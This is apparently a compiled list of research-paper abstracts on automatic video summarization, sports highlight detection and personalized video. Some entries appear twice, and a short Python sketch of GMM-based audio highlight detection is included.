--- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts in faster than realtime. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. The prototype experiments have shown the effectiveness and stabilities of the system. 
--- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing. Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: Tennis video abstraction from audio and visual cues paper_content: We propose a context-based model of video abstraction exploiting both audio and video features and applied to tennis TV programs. We can automatically produce different types of summary of a given video depending on the users' constraints or preferences. We have first designed an efficient and accurate temporal segmentation of the video into segments homogeneous w.r.t the camera motion. We introduce original visual descriptors related to the dominant and residual image motions. The different summary types are obtained by specifying adapted classification criteria which involve audio features to select the relevant segments to be included in the video abstract. The proposed scheme has been validated on 22 hours of tennis videos. --- paper_title: From context to content: leveraging context to infer media metadata paper_content: The recent popularity of mobile camera phones allows for new opportunities to gather important metadata at the point of capture. This paper describes a method for generating metadata for photos using spatial, temporal, and social context. We describe a system we implemented for inferring location information for pictures taken with camera phones and its performance evaluation. We propose that leveraging contextual metadata at the point of capture can address the problems of the semantic and sensory gaps. In particular, combining and sharing spatial, temporal, and social contextual metadata from a given user and across users allows us to make inferences about media content. --- paper_title: Automatic Soccer Video Analysis and Summarization paper_content: We propose a fully automatic and computationally efficient framework for analysis and summarization of soccer videos using cinematic and object-based features. The proposed framework includes some novel low-level processing algorithms, such as dominant color region detection, robust shot boundary detection, and shot classification, as well as some higher-level algorithms for goal detection, referee detection, and penalty-box detection. 
The system can output three types of summaries: i) all slow-motion segments in a game; ii) all goals in a game; iii) slow-motion segments classified according to object-based features. The first two types of summaries are based on cinematic features only for speedy processing, while the summaries of the last type contain higher-level semantics. The proposed framework is efficient, effective, and robust. It is efficient in the sense that there is no need to compute object-based features when cinematic features are sufficient for the detection of certain events, e.g., goals in soccer. It is effective in the sense that the framework can also employ object-based features when needed to increase accuracy (at the expense of more computation). The efficiency, effectiveness, and robustness of the proposed framework are demonstrated over a large data set, consisting of more than 13 hours of soccer video, captured in different countries and under different conditions. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Design and evaluation of a music video summarization system paper_content: We present a system that summarizes the textual, audio, and video information of music videos in a format tuned to the preferences of a focus group of 20 users. First, we analyzed user-needs for the content and the layout of the music summaries. Then, we designed algorithms that segment individual song videos from full music video programs by noting changes in color palette, transcript, and audio classification. We summarize each song with automatically selected high level information such as title, artist, duration, title frame, and text as well as audio and visual segments of the chorus. Our system automatically determines with high recall and precision chorus locations, from the placement of repeated words and phrases in the text of the song's lyrics. Our Bayesian belief network then selects other significant video and audio content from the multiple media. Overall, we are able to compress content by a factor of 10. Our second user study has identified the principal variations between users in their choices of content desired in the summary, and in their choices of the platforms that should support their viewing. --- paper_title: Summarizing wearable video paper_content: "We want to record our entire life by video" is the motivation of this research. Developing wearable devices and huge storage devices will make it possible to keep entire life by video. We could capture 70 years of our life, however, the problem is how to handle such a huge amount of data. Automatic summarization based on personal interest should be required. 
In this paper we propose an approach to the automatic structuring and summarization of wearable video. (Wearable video is our abbreviation of "video captured by a wearable camera".) In our approach, we make use of a wearable camera and a sensor of brain waves. The video is firstly structured by objective features of video, and the shots are rated by subjective measures based on brain waves. The approach is very successful for real world experiments and it automatically extracted all the events that the subjects reported they had felt interesting. --- paper_title: Creating audio keywords for event detection in soccer video paper_content: This paper presents a novel framework called audio keywords to assist event detection in soccer video. Audio keyword is a middle-level representation that can bridge the gap between low-level features and high-level semantics. Audio keywords are created from low-level audio features by using support vector machine learning. The created audio keywords can be used to detect semantic events in soccer video by applying a heuristic mapping. Experiments of audio keywords creation and event detection based on audio keywords have illustrated promising results. According to the experimental results, we believe that audio keyword is an effective representation that is able to achieve more intuitionistic result for event detection in sports video compared with the method of event detection directly based on low-level features. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: Event detection in baseball video using superimposed caption recognition paper_content: We have developed a novel system for baseball video event detection and summarization using superimposed caption text detection and recognition. The system detects different types of semantic level events in baseball video including scoring and last pitch of each batter. The system has two components: event detection and event boundary detection. 
Event detection is realized by change detection and recognition of game stat texts (such as text information showing in score box). Event boundary detection is achieved using our previously developed algorithm, which detects the pitch view as the event beginning and nonactive view as potential endings of the event. One unique contribution of the system is its capability to accurately detect the semantic level events by combining video text recognition with camera view recognition. Another unique feature is the real-time processing speed by taking advantage of compressed-domain approaches in part of the algorithms such as caption detection. To the best of our knowledge, this is the first system achieving accurate detection of multiple types of high-level semantic events in baseball videos. --- paper_title: The priority curve algorithm for video summarization paper_content: In this paper, we introduce the concept of a priority curve associated with a video. We then provide an algorithm that can use the priority curve to create a summary (of a desired length) of any video. The summary thus created exhibits nice continuity properties and also avoids repetition. We have implemented the priority curve algorithm (PCA) and compared it with other summarization algorithms in the literature. We show that PCA is faster than existing algorithms and also produces better quality summaries. The quality of summaries was evaluated by a group of 200 students in Naples, Italy, who watched soccer videos. We also briefly describe a soccer video summarization system we have built on using the PCA architecture and various (classical) image processing algorithms. --- paper_title: Multimedia content analysis-using both audio and visual clues paper_content: Multimedia content analysis refers to the computerized understanding of the semantic meanings of a multimedia document, such as a video sequence with an accompanying audio track. With a multimedia document, its semantics are embedded in multiple forms that are usually complimentary of each other, Therefore, it is necessary to analyze all types of data: image frames, sound tracks, texts that can be extracted from image frames, and spoken words that can be deciphered from the audio track. This usually involves segmenting the document into semantically meaningful units, classifying each unit into a predefined scene type, and indexing and summarizing the document for efficient retrieval and browsing. We review advances in using audio and visual information jointly for accomplishing the above tasks. We describe audio and visual features that can effectively characterize scene content, present selected algorithms for segmentation and classification, and review some testbed systems for video archiving and retrieval. We also describe audio and visual descriptors and description schemes that are being considered by the MPEG-7 standard for multimedia content description. --- paper_title: Generation of personalized abstract of sports video paper_content: Video abstraction is defined as creating a shorter video clip from an original video stream. In this paper, we propose a method of generating a personalized abstract of broadcasted sports video. We first detect significant events from the video stream by matching with gamestats in which highlights of the game are described. Textual information in an overlay appearing on an image frame is recognized for this matching. Then, we select highlight shots from these detected events, reflecting on personal preferences. 
Finally, we connect each shot augmented with related audio and text in temporal order. From experimental results, we verified that an hour-length video can be compressed into a minute-length personalized abstract. --- paper_title: MSN: statistical understanding of broadcasted baseball video using multi-level semantic network paper_content: The information processing of sports video yields valuable semantics for content delivery over narrowband networks. Traditional image/video processing is formulated in terms of low-level features describing image/video structure and intensity, while the high-level knowledge such as common sense and human perceptual knowledge is encoded in abstract and nongeometric representations. The management of semantic information in video becomes more and more difficult because of the large difference in representations, levels of knowledge, and abstract episodes. This paper proposes a semantic highlight detection scheme using a Multi-level Semantic Network (MSN) for baseball video interpretation. The probabilistic structure can be applied for highlight detection and shot classification. Satisfactory results will be shown to illustrate better performance compared with the traditional ones. --- paper_title: Highlights for more complete sports video summarization paper_content: Summarization is an essential requirement for achieving a more compact and interesting representation of sports video contents. We propose a framework that integrates highlights into play segments and reveal why we should still retain breaks. Experimental results show that fast detections of whistle sounds, crowd excitement, and text boxes can complement existing techniques for play-breaks and highlights localization. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news. --- paper_title: Content-based multimedia information retrieval: State of the art and challenges paper_content: Extending beyond the boundaries of science, art, and culture, content-based multimedia information retrieval provides new paradigms and methods for searching through the myriad variety of media all over the world. This survey reviews 100+ recent articles on content-based multimedia information retrieval and discusses their role in current research directions which include browsing and search paradigms, user studies, affective computing, learning, semantic queries, new features and media types, high performance indexing, and evaluation techniques. Based on the current state of the art, we discuss the major challenges for the future. --- paper_title: Video summarization based on user log enhanced link analysis paper_content: Efficient video data management calls for intelligent video summarization tools that automatically generate concise video summaries for fast skimming and browsing.
Traditional video summarization techniques are based on low-level feature analysis, which generally fails to capture the semantics of video content. Our vision is that users unintentionally embed their understanding of the video content in their interaction with computers. This valuable knowledge, which is difficult for computers to learn autonomously, can be utilized for video summarization process. In this paper, we present an intelligent video browsing and summarization system that utilizes previous viewers' browsing log to facilitate future viewers. Specifically, a novel ShotRank notion is proposed as a measure of the subjective interestingness and importance of each video shot. A ShotRank computation framework is constructed to seamlessly unify low-level video analysis and user browsing log mining. The resulting ShotRank is used to organize the presentation of video shots and generate video skims. Experimental results from user studies have strongly confirmed that ShotRank indeed represents the subjective notion of interestingness and importance of each video shot, and it significantly improves future viewers' browsing experience. --- paper_title: Two-Stage Hierarchical Video Summary Extraction to Match Low-Level User Browsing Preferences paper_content: A compact summary of video that conveys visual content at various levels of detail enhances user interaction significantly. In this paper, we propose a two-stage framework to generate MPEG-7-compliant hierarchical key frame summaries of video sequences. At the first stage, which is carried out off-line at the time of content production, fuzzy clustering and data pruning methods are applied to given video segments to obtain a nonredundant set of key frames that comprise the finest level of the hierarchical summary. The number of key frames allocated to each shot or segment is determined dynamically and without user supervision through the use of cluster validation techniques. A coarser summary is generated on-demand in the second stage by reducing the number of key frames to match the low-level browsing preferences of a user. The proposed method has been validated by experimental results on a collection of video programs. --- paper_title: Evaluation of video summarization for a large number of cameras in ubiquitous home paper_content: A system for video summarization in a ubiquitous environment is presented. Data from pressure-based floor sensors are clustered to segment footsteps of different persons. Video handover has been implemented to retrieve a continuous video showing a person moving in the environment. Several methods for extracting key frames from the resulting video sequences have been implemented, and evaluated by experiments. It was found that most of the key frames the human subjects desire to see could be retrieved using an adaptive algorithm based on camera changes and the number of footsteps within the view of the same camera. The system consists of a graphical user interface that can be used to retrieve video summaries interactively using simple queries. --- paper_title: Efficient retrieval of life log based on context and content paper_content: In this paper, we present continuous capture of our life log with various sensors plus additional data and propose effective retrieval methods using this context and content. Our life log system contains video, audio, acceleration sensor, gyro, GPS, annotations, documents, web pages, and emails. 
In our previous studies, we showed our retrieval methodology [8], [9], which mainly depends on context information from sensor data. In this paper, we extend our methodology with additional functions. They are (1) spatio-temporal sampling for extraction of key frames for summarization; and (2) conversation scene detection. With the first of these, key frames for the summarization are extracted using time and location data (GPS). Because our life log captures dense location data, we can also make use of derivatives of location data, that is, speed and acceleration in the movement of the person. The summarizing key frames are made using them. We also introduce content analysis for conversation scene detection. In our previous work, we have investigated context-based retrieval, which differs from the majority of studies in image/video retrieval focusing on content-based retrieval. In this paper, we introduce visual and audio data content analysis for conversation scene detection. The detection of conversation scenes will be very important tags for our life log data retrieval. We describe our present system and additional functions, as well as preliminary results for the additional functions. --- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: Automatic generation of video summaries for historical films paper_content: A video summary is a sequence of video clips extracted from a longer video. Much shorter than the original, the summary preserves its essential messages. In the ECHO (European Chronicles On-line) project, a system was developed to store and manage large collections of historical films for the preservation of cultural heritage. At the University of Mannheim, we have developed the video summarization component of the ECHO system. We discuss the particular challenges the historical film material poses, and how we have designed new video processing algorithms and modified existing ones to cope with noisy black-and-white films. --- paper_title: Optimizing user expectations for video semantic filtering and abstraction paper_content: We describe a novel automatic system that generates personalized videos based on semantic filtering or summarization techniques. This system uses a new set of more than one hundred visual semantic detectors that automatically detect video concepts in faster than realtime. Based on personal profiles, the system generates either video summaries from video databases or filtered video contents from live broadcasting videos. 
The prototype experiments have shown the effectiveness and stabilities of the system. --- paper_title: A highlight scene detection and video summarization system using audio feature for a personal video recorder paper_content: The personal video recorder such as recordable-DVD recorder, Blu-ray disc recorder and/or hard disc recorder has become popular for a large volume storage device for video/audio content data and a browsing function that would quickly provide a desired scene to the user is required as an essential part of such a large capacity recording/playback system. We propose a highlight scene detection function by using only 'audio' features and realize a browsing function for the recorder that enables completely automatic detection of sports highlights. We detect sports highlights by identifying portions with "commentator's excited speech" using Gaussian mixture models (GMM's) trained using the MDL criterion. Our computation is carried out directly on the MDCT coefficients from the AC-3 coefficients thus giving us a tremendous speed advantage. Our accuracy of detection of sports highlights is high across a variety of sports. --- paper_title: An empirical investigation into user navigation of digital video using the VCR-like control set paper_content: There has been an almost explosive growth in digital video in recent years. The convention for enabling users to navigate digital video is the Video Cassette Recorder-like (VCR-like) control set, which is dictated by the proliferation of media players that embody it, including Windows Media Player and QuickTime. However, there is a dearth of research seeking to understand how users relate to this control set and how useful it actually is in practice. This paper details our empirical investigation of the issue. A digital video navigation system with a VCR-like control set was developed and subsequently used by a large sample of users (n=200), who were required to complete a number of goal-directed navigational tasks. Each user's navigational activity was tracked and recorded automatically by the system. Analysis of the navigational data revealed a range of results concerning how the VCR-like control set both enhanced and limited the user's ability to locate sequences of interest, including a number of searching and browsing strategies that were exploited by the users. --- paper_title: Video Adaptation: Concepts, Technologies, and Open Issues paper_content: Video adaptation is an emerging field that offers a rich body of techniques for answering challenging questions in pervasive media applications. It transforms the input video(s) to an output in video or augmented multimedia form by utilizing manipulations at multiple levels (signal, structural, or semantic) in order to meet diverse resource constraints and user preferences while optimizing the overall utility of the video. There has been a vast amount of activity in research and standard development in this area. This paper first presents a general framework that defines the fundamental entities, important concepts (i.e., adaptation, resource, and utility), and formulation of video adaptation as constrained optimization problems. A taxonomy is used to classify different types of adaptation techniques. The state of the art in several active research areas is reviewed with open challenging issues identified. Finally, support of video adaptation from related international standards is discussed. 
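The highlight-detection entry above ("A highlight scene detection and video summarization system using audio feature for a personal video recorder") locates sports highlights by modelling the commentator's excited speech with Gaussian mixture models trained on audio features taken directly from the AC-3 audio stream. The sketch below illustrates the general idea only: it assumes precomputed per-window audio feature vectors (for example MFCCs) rather than the paper's MDCT coefficients, it uses scikit-learn's GaussianMixture in place of the authors' MDL-trained models, and the smoothing length and log-likelihood-ratio threshold are illustrative assumptions rather than values from the paper.

```python
import numpy as np
from sklearn.mixture import GaussianMixture

def train_audio_models(excited_feats, background_feats, n_components=8, seed=0):
    """Fit one GMM to 'excited speech' windows and one to all other audio.

    Both inputs are arrays of shape (n_windows, n_dims), e.g. MFCC vectors
    over short windows (an assumption; the cited system works on MDCT
    coefficients taken directly from the AC-3 stream).
    """
    gmm_excited = GaussianMixture(n_components=n_components,
                                  covariance_type="diag",
                                  random_state=seed).fit(excited_feats)
    gmm_background = GaussianMixture(n_components=n_components,
                                     covariance_type="diag",
                                     random_state=seed).fit(background_feats)
    return gmm_excited, gmm_background

def highlight_segments(feats, gmm_excited, gmm_background,
                       smooth=50, threshold=0.0):
    """Return (start, end) window indices whose smoothed log-likelihood
    ratio favours the 'excited speech' model over the background model."""
    llr = gmm_excited.score_samples(feats) - gmm_background.score_samples(feats)
    llr = np.convolve(llr, np.ones(smooth) / smooth, mode="same")
    segments, start = [], None
    for i, is_excited in enumerate(llr > threshold):
        if is_excited and start is None:
            start = i
        elif not is_excited and start is not None:
            segments.append((start, i))
            start = None
    if start is not None:
        segments.append((start, len(llr)))
    return segments
```

The returned window ranges would then be mapped back to time stamps and concatenated into the highlight reel; the threshold trades recall of exciting moments against summary length.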
--- paper_title: Using MPEG-7 and MPEG-21 for personalizing video paper_content: As multimedia content has proliferated over the past several years, users have begun to expect that content be easily accessed according to their own preferences. One of the most effective ways to do this is through using the MPEG-7 and MPEG-21 standards, which can help address the issues associated with designing a video personalization and summarization system in heterogeneous usage environments. This three-tier architecture provides a standards-compliant infrastructure that, in conjunction with our tools, can help select, adapt, and deliver personalized video summaries to users. In extending our summarization research, we plan to explore semantic similarities across multiple simultaneous news media sources and to abstract summaries for different viewpoints. Doing so will allow us to track a semantic topic as it evolves into the future. As a result, we should be able to summarize news repositories into a smaller collection of topic threads. --- paper_title: Interface Design for MyInfo: a Personal News Demonstrator Combining Web and TV Content paper_content: This paper describes MyInfo, a novel interface for a personal news demonstrator that processes and combines content from TV and the web. We detail our design process from concept generation to focus group exploration to final design. Our design focuses on three issues: (i) ease-of-use, (ii) video summarization, and (iii) news personalization. With a single button press on the remote control, users access specific topics such as weather or traffic. In addition, users can play back personalized news content as a TV show, leaving themselves free to complete other tasks in their homes, while consuming the news. --- paper_title: Video skimming and characterization through the combination of image and language understanding paper_content: Digital video is rapidly becoming important for education, entertainment and a host of multimedia applications. With the size of the video collections growing to thousands of hours, technology is needed to effectively browse segments in a short time without losing the content of the video. We propose a method to extract the significant audio and video information and create a skim video which represents a very short synopsis of the original. The goal of this work is to show the utility of integrating language and image understanding techniques for video skimming by extraction of significant information, such as specific objects, audio keywords and relevant video structure. The resulting skim video is much shorter; where compaction is as high as 20:1, and yet retains the essential content of the original segment. We have conducted a user-study to test the content summarization and effectiveness of the skim as a browsing tool. --- paper_title: An innovative algorithm for key frame extraction in video summarization paper_content: Video summarization, aimed at reducing the amount of data that must be examined in order to retrieve the information desired from information in a video, is an essential task in video analysis and indexing applications. We propose an innovative approach for the selection of representative (key) frames of a video sequence for video summarization. By analyzing the differences between two consecutive frames of a video sequence, the algorithm determines the complexity of the sequence in terms of changes in the visual content expressed by different frame descriptors. 
The algorithm, which escapes the complexity of existing methods based, for example, on clustering or optimization strategies, dynamically and rapidly selects a variable number of key frames within each sequence. The key frames are extracted by detecting curvature points within the curve of the cumulative frame differences. Another advantage is that it can extract the key frames on the fly: curvature points can be determined while computing the frame differences and the key frames can be extracted as soon as a second high curvature point has been detected. We compare the performance of this algorithm with that of other key frame extraction algorithms based on different approaches. The summaries obtained have been objectively evaluated by three quality measures: the Fidelity measure, the Shot Reconstruction Degree measure and the Compression Ratio measure. --- paper_title: Highlight sound effects detection in audio stream paper_content: This paper addresses the problem of highlight sound effects detection in audio stream, which is very useful in fields of video summarization and highlight extraction. Unlike researches on audio segmentation and classification, in this domain, it just locates those highlight sound effects in audio stream. An extensible framework is proposed and in current system three sound effects are considered: laughter, applause and cheer, which are tied up with highlight events in entertainments, sports, meetings and home videos. HMMs are used to model these sound effects and a log-likelihood scores based method is used to make final decision. A sound effect attention model is also proposed to extend general audio attention model for highlight extraction and video summarization. Evaluations on a 2-hours audio database showed very encouraging results. --- paper_title: Classification of self-consumable highlights for soccer video summaries paper_content: An effective scheme for soccer summarization is significant to improve the usage of this massively growing video data. The paper presents an extension to our recent work which proposed a framework to integrate highlights into play-breaks to construct more complete soccer summaries. The current focus is to demonstrate the benefits of detecting some specific audio-visual features during play-break sequences in order to classify highlights contained within them. The main purpose is to generate summaries which are self-consumable individually. To support this framework, the algorithms for shot classification and detection of near-goal and slow-motion replay scenes is described. The results of our experiment using 5 soccer videos (20 minutes each) show the performance and reliability of our framework --- paper_title: Augmented segmentation and visualization for presentation videos paper_content: We investigate methods of segmenting, visualizing, and indexing presentation videos by both audio and visual data. The audio track is segmented by speaker, and augmented with key phrases which are extracted using an Automatic Speech Recognizer (ASR). The video track is segmented by visual dissimilarities and changes in speaker gesturing, and augmented by representative key frames. An interactive user interface combines a visual representation of audio, video, text, key frames, and allows the user to navigate presentation videos. User studies with 176 students of varying knowledge were conducted on 7.5 hours of student presentation video (32 presentations). 
Tasks included searching for various portions of presentations, both known and unknown to students, and summarizing presentations given the annotations. The results are favorable towards the video summaries and the interface, suggesting faster responses by a factor of 20% compared to having access to the actual video. Accuracy of responses remained the same on average. Follow-up surveys present a number of suggestions towards improving the interface, such as the incorporation of automatic speaker clustering and identification, and the display of an abstract topological view of the presentation. Surveys also show alternative contexts in which students would like to use the tool in the classroom environment. --- paper_title: A fast layout algorithm for visual video summaries paper_content: We created an improved layout algorithm for automatically generating visual video summaries reminiscent of comic book pages. The summaries are comprised of images from the video that are sized according to their importance. The algorithm performs a global optimization with respect to a layout cost function that encompasses features such as the number of resized images and the amount of whitespace in the presentation. The algorithm creates summaries that: always fit exactly into the requested area, are varied by containing few rows with images of the same size, and have little whitespace at the end of the last row. The layout algorithm is fast enough to allow the interactive resizing of the summaries and the subsequent generation of a new layout. --- paper_title: Spatio-temporal quality assessment for home videos paper_content: Compared with the video programs taken by professionals, home videos are always with low-quality content resulted from lack of professional capture skills. In this paper, we present a novel spatio-temporal quality assessment scheme in terms of low-level content features for home videos. In contrast to existing frame-level-based quality assessment approaches, a type of temporal segment of video, sub-shot, is selected as the basic unit for quality assessment. A set of spatio-temporal artifacts, regarded as the key factors affecting the overall perceived quality (i.e. unstableness, jerkiness, infidelity, blurring, brightness and orientation), are mined from each sub-shot based on the particular characteristics of home videos. The relationship between the overall quality metric and these factors are exploited by three different methods, including user study, factor fusion, and a learning-based scheme. To validate the proposed scheme, we present a scalable quality-based home video summarization system, aiming at achieving the best quality while simultaneously preserving the most informative content. A comparison user study between this system and the attention model based video skimming approach demonstrated the effectiveness of the proposed quality assessment scheme. --- paper_title: Video summarization by spatial-temporal graph optimization paper_content: In this paper we present a novel approach for video summarization based on graph optimization. Our approach emphasizes both a comprehensive visual-temporal content coverage and visual coherence of the video summary. The approach has three stages. First, the source video is segmented into video shots, and a candidate shot set is selected from the video shots according to some video features. 
Second, a dissimilarity function is defined between the video shots to describe their spatial-temporal relation, and the candidate video shot set is modelled into a directional graph. Third, we outline a dynamic programming algorithm and use it to search the longest path in the graph as the final video skimming. A static video summary is generated at the same time. Experimental results show encouraging promises of our approach for video summarization. --- paper_title: Affective video content representation and modeling paper_content: This paper looks into a new direction in video content analysis - the representation and modeling of affective video content . The affective content of a given video clip can be defined as the intensity and type of feeling or emotion (both are referred to as affect) that are expected to arise in the user while watching that clip. The availability of methodologies for automatically extracting this type of video content will extend the current scope of possibilities for video indexing and retrieval. For instance, we will be able to search for the funniest or the most thrilling parts of a movie, or the most exciting events of a sport program. Furthermore, as the user may want to select a movie not only based on its genre, cast, director and story content, but also on its prevailing mood, the affective content analysis is also likely to contribute to enhancing the quality of personalizing the video delivery to the user. We propose in this paper a computational framework for affective video content representation and modeling. This framework is based on the dimensional approach to affect that is known from the field of psychophysiology. According to this approach, the affective video content can be represented as a set of points in the two-dimensional (2-D) emotion space that is characterized by the dimensions of arousal (intensity of affect) and valence (type of affect). We map the affective video content onto the 2-D emotion space by using the models that link the arousal and valence dimensions to low-level features extracted from video data. This results in the arousal and valence time curves that, either considered separately or combined into the so-called affect curve, are introduced as reliable representations of expected transitions from one feeling to another along a video, as perceived by a viewer. --- paper_title: Video caption detection and extraction using temporal information paper_content: Video caption detection and extraction is an important step for information retrieval in video databases. In this paper, we extract text information in video by fully utilizing the temporal information contained in the video. First we create a binary abstract sequence from a video segment. By analyzing the statistical pixel changes in the sequence, we can effectively locate the (dis)appealing frames of captions. Finally we extract the captions to create a summary of the video segment. --- paper_title: Automatic Soccer Video Analysis and Summarization paper_content: We propose a fully automatic and computationally efficient framework for analysis and summarization of soccer videos using cinematic and object-based features. The proposed framework includes some novel low-level processing algorithms, such as dominant color region detection, robust shot boundary detection, and shot classification, as well as some higher-level algorithms for goal detection, referee detection, and penalty-box detection. 
The system can output three types of summaries: i) all slow-motion segments in a game; ii) all goals in a game; iii) slow-motion segments classified according to object-based features. The first two types of summaries are based on cinematic features only for speedy processing, while the summaries of the last type contain higher-level semantics. The proposed framework is efficient, effective, and robust. It is efficient in the sense that there is no need to compute object-based features when cinematic features are sufficient for the detection of certain events, e.g., goals in soccer. It is effective in the sense that the framework can also employ object-based features when needed to increase accuracy (at the expense of more computation). The efficiency, effectiveness, and robustness of the proposed framework are demonstrated over a large data set, consisting of more than 13 hours of soccer video, captured in different countries and under different conditions. --- paper_title: Dynamic storyboards for video content summarization paper_content: We propose an innovative, general purpose, approach to the selection and hierarchical representation of key frames of a video sequence for video summarization. In the first stage the shot detection module performs the video structural analysis; in the second stage the key frame extraction module creates the visual summary; and the last stage the summary post-processing module, after a pre-a classification aimed remove meaningless key frames, create a multilevel storyboard that the user may browse. --- paper_title: Two-Stage Hierarchical Video Summary Extraction to Match Low-Level User Browsing Preferences paper_content: A compact summary of video that conveys visual content at various levels of detail enhances user interaction significantly. In this paper, we propose a two-stage framework to generate MPEG-7-compliant hierarchical key frame summaries of video sequences. At the first stage, which is carried out off-line at the time of content production, fuzzy clustering and data pruning methods are applied to given video segments to obtain a nonredundant set of key frames that comprise the finest level of the hierarchical summary. The number of key frames allocated to each shot or segment is determined dynamically and without user supervision through the use of cluster validation techniques. A coarser summary is generated on-demand in the second stage by reducing the number of key frames to match the low-level browsing preferences of a user. The proposed method has been validated by experimental results on a collection of video programs. --- paper_title: A highlight scene detection and video summarization system using audio feature for a personal video recorder paper_content: The personal video recorder such as recordable-DVD recorder, Blu-ray disc recorder and/or hard disc recorder has become popular for a large volume storage device for video/audio content data and a browsing function that would quickly provide a desired scene to the user is required as an essential part of such a large capacity recording/playback system. We propose a highlight scene detection function by using only 'audio' features and realize a browsing function for the recorder that enables completely automatic detection of sports highlights. We detect sports highlights by identifying portions with "commentator's excited speech" using Gaussian mixture models (GMM's) trained using the MDL criterion. 
Our computation is carried out directly on the MDCT coefficients from the AC-3 coefficients thus giving us a tremendous speed advantage. Our accuracy of detection of sports highlights is high across a variety of sports. --- paper_title: Flashlight and player detection in fighting sport for video summarization paper_content: In this paper, we present a method for generating highlight summaries of fighting sport videos using flashlight detection [N. Benjamas et al., May 2005] and player detection, by detecting frames that contain close-up flashlights and players. The detected flashlights and the distance between players are utilized for efficient summarization of fighting sport videos. The proposed algorithm first detects the players using skin color detection and connected component labeling. Then, it identifies the relevant frames by calculating the distance between one player and the other. Because the algorithm accurately estimates the distance between players, it is able to capture inherently important events. --- paper_title: A utility framework for the automatic generation of audio-visual skims paper_content: In this paper, we present a novel algorithm for generating audio-visual skims from computable scenes. Skims are useful for browsing digital libraries, and for on-demand summaries in set-top boxes. A computable scene is a chunk of data that exhibits consistencies with respect to chromaticity, lighting and sound. There are three key aspects to our approach: (a) visual complexity and grammar, (b) robust audio segmentation and (c) a utility model for skim generation. We define a measure of visual complexity of a shot, and map complexity to the minimum time for comprehending the shot. Then, we analyze the underlying visual grammar, since it makes the shot sequence meaningful. We segment the audio data into four classes, and then detect significant phrases in the speech segments. The utility functions are defined in terms of complexity and duration of the segment. The target skim is created using a general constrained utility maximization procedure that maximizes the information content and the coherence of the resulting skim. The objective function is constrained by multimedia synchronization constraints, visual syntax, and penalty functions on audio and video segments. The user study results indicate that the optimal skims show statistically significant differences from other skims, with compression rates up to 90%. --- paper_title: Adaptive extraction of highlights from a sport video based on excitement modeling paper_content: This paper addresses the challenge of automatically extracting the highlights from sports TV broadcasts. In particular, we are interested in finding a generic method of highlights extraction, which does not require the development of models for the events that are thought to be interpreted by the users as highlights. Instead, we search for highlights in those video segments that are expected to excite the users most. It is namely realistic to assume that a highlighting event induces a steady increase in a user's excitement, as compared to other, less interesting events. We mimic the expected variations in a user's excitement by observing the temporal behavior of selected audiovisual low-level features and the editing scheme of a video. Relations between this noncontent information and the evoked excitement are drawn partly from psychophysiological research and partly from analyzing the live-video directing practice.
